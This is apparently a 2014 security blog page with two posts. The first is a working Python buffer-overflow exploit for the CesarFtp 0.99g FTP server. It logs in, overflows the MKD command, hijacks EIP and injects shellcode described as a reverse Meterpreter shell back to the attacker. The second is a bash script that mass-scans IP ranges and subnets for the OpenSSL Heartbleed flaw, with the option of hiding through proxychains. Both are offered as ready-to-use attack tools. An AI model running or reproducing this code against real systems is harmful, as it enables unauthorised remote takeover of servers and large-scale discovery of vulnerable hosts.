Saturday, April 26, 2014

CesarFtp 0.99g Buffer Overflow Exploit

#!/usr/bin/python
#CesarFtp 0.99g Buffer Overflow Exploit by 1N3 @ treadstonesecurity.blogspot.ca
#Uses Metasploit's exploit/multi/handler reverse meterpreter shellcode to gain remote access to the target. Replace as needed.

from socket import *

shellcode = ( # reverse meterpreter shell 4444
"\xbb\x9c\x7e\x21\x9b\xdb\xca\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x18\x31\x5a\x13\x83\xc2\x04\x03\x5a\x93\x9c\xd4\x67\x9a\xbb"
"\x73\x13\x9f\x0b\xf7\x63\x13\xe7\x57\x78\xa0\xe5\xdc\xf2\x96"
"\xa4\x4e\xbc\xd5\xb0\xad\x73\xea\xe3\xff\x06\xe3\x97\x6a\xe1"
"\x70\xe2\x56\x7a\xca\xe8\xde\xf7\x9e\xff\x02\x09\xf7\x8b\x7a"
"\x51\x06\x64\xf7\x10\x34\x75\xe6\xd0\x2d\x79\xa5\xbc\xac\xeb"
"\x4b\xbe\x7e\x7c\x23\x80\xd6\x94\xbe\x68\x24\x9b\xaf\x34\xa1"
"\x7a\x9c\x73\xbd\x2f\x72\x2b\xec\xa5\x64\x82\x59\x6c\x7a\xc1")

def intel_order(i):
    a = chr(i % 256)
    i = i >> 8
    b = chr(i % 256)
    i = i >> 8
    c = chr(i % 256)
    i = i >> 8
    d = chr(i % 256)
    str = "%c%c%c%c" % (a, b, c, d)
    return str

host = "192.168.23.112"
port = 21
user = "ftp"
password = "ftp"
#EIP = 0x77D718FC #jmp esp <user32.dll XP SP1 english>
EIP = 0x76AA679b #jmp esp <metasploit module>

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("user %s\r\n" % (user))
print s.recv(1024)

s.send("pass %s\r\n" % (password))
print s.recv(1024)

buffer = "MKD "
buffer += "\n" * 671
buffer += "A" * 3 + intel_order(EIP)
buffer += "\x90" * 40 + shellcode
buffer += "\r\n"

print "len: %d" % (len(buffer))

s.send(buffer)
print s.recv(1024)

s.close()

Wednesday, April 16, 2014

MassBleed OpenSSL HeartBleed Scanner



#!/bin/bash
# massbleed.sh 20140423 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy]
#
# This script has four main functions with the ability to proxy all connections:
# 1. To mass scan any CIDR range for HeartBleed via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)
# 2. To scan any CIDR range for HeartBleed via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)
# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)
# 4. To scan every open port on every host in a single class C subnet for HeartBleed (example: sh massbleed.sh 192.168.0. subnet)
#
# PROXY: A proxy option has been added to scan and run the scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
# USAGE EXAMPLES:
# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy)
# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy)
# (example: sh massbleed.sh 127.0.0.1 single 0 proxy)
# (example: sh massbleed.sh 192.168.0. subnet 0 proxy)
#
# Prerequisites:
# Is the heartbleed POC present?
# Is unicornscan installed?
# Is nmap installed?

echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== massbleed.sh 20140423 by 1N3"
echo ""

HEARTBLEED=`ls heartbleed.py`
UNICORNSCAN=`which unicornscan`
NMAP=`which nmap`
RANGE=$1
ALL_PORTS=$2
CUSTOM_PORT=$3
PROXY=$4
PORT_RANGE="1-65000"

if [ "$HEARTBLEED" != "heartbleed.py" ]; then
    echo "(--==== heartbleed.py not found!"
    echo "(--==== To fix, download the POC by Jared Stafford and place in same directory named: heartbleed.py"
    exit
fi

if [ "$UNICORNSCAN" == "" ]; then
    echo "(--==== unicornscan not installed! Exiting..."
    exit
fi

if [ "$NMAP" == "" ]; then
    echo "(--==== nmap not installed! Exiting..."
    exit
fi

if [ -z "$1" ]; then
    echo "(--==== usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]"
    exit
fi

if [ "$PROXY" = "proxy" ]; then
    echo "(--==== scanning via proxy..."
    if [ "$ALL_PORTS" = "single" ]; then
        if [ "$CUSTOM_PORT" != "0" ]; then
            echo "(--==== Checking $RANGE:$CUSTOM_PORT" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep Server 2> /dev/null
        else
            for a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
                do echo "(--==== Checking $RANGE:"$a && proxychains python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null;
            done;
        fi
    fi
    if [ "$ALL_PORTS" = "subnet" ]; then
        for a in {1..254};
        do
            echo "Scanning: $RANGE$a"
            for b in `proxychains unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
                do
                echo "$RANGE$a:$b"
                proxychains python heartbleed.py $RANGE$a -p $b | grep Server;
            done;
        done;
    fi
    if [ "$ALL_PORTS" = "port" ]; then
        for a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
            do echo "(--==== Checking:" $a:$CUSTOM_PORT&& proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep Server;
        done;
    else
        for a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`;
            do echo "(--==== Checking:" $a && proxychains python heartbleed.py $a -p 443 | grep Server;
        done
    fi
else
    if [ "$ALL_PORTS" = "single" ]; then
        for a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
            do echo "(--==== Checking $RANGE:"$a && python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null;
        done;
    fi
    if [ "$ALL_PORTS" = "subnet" ]; then
        for a in {1..254};
        do
            echo "Scanning: $RANGE$a"
            for b in `unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
                do
                echo "$RANGE$a:$b"
                python heartbleed.py $RANGE$a -p $b | grep Server;
            done;
        done;
    fi
    if [ "$ALL_PORTS" = "port" ]; then
        for a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
            do echo "(--==== Checking:" $a:$CUSTOM_PORT&& python heartbleed.py $a -p $CUSTOM_PORT | grep Server;
        done;
    else
        for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`;
            do echo "(--==== Checking:" $a && python heartbleed.py $a -p 443 | grep Server;
        done
    fi
fi

echo "(--==== scan complete!"
exit